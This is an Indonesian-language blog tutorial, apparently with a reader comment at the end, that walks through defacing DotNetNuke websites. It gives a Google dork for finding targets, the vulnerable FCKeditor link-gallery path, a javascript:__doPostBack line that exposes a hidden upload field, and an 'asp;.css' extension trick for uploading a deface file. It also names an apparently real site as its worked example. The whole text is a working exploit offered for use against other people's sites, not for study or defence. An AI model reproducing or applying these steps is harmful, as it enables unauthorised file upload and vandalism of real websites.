Arti dari DNN adalah :
DotNetNuke merupakan salah satu framework web aplikasi yang open source dengan
menggunakan bahasa VB.NET. Aplikasi dari CMS ini dapat diperluas melalui penggunaan
dari modul dan skin sehingga aplikasi ini digunakan untuk membuat, menyebarkan,
dan mengatur intranet, extranet dan website.
kira - kira seperti itulah
bahan2 :
html depes, or kalo males pake *.txt aja
eh kalo mo depes pake html jangan lupa di manipulasi URL
*.html jadi *.asp;.css
browser
dork :
inurl:"/Portals/0/"
exploit :
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
contoh :
site :
http://www.tbfreebird.com [cuma diambil URL domain]
tyuz ditambahi exploit jadi :
http://www.tbfreebird.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
setelah dicopas di address bar lalu pilih yang
File ( A File On Your Site )
setelah itu copas pada address bar tersebut :
javascript:__doPostBack('ctlURL$cmdUpload','')
ntar akan ada kolom buat apload file
lalu silahkan aplod file depes kalian..
file kalian akan tersimpan di :
http://[site]/Portals/0/FileKamu
http://www.tbfreebird.com/Portals/1/cintya.asp;.css
kebetulan saya menggunakan file : cintya.asp;.css
tutorial nya ngk jLas om...
BalasHapus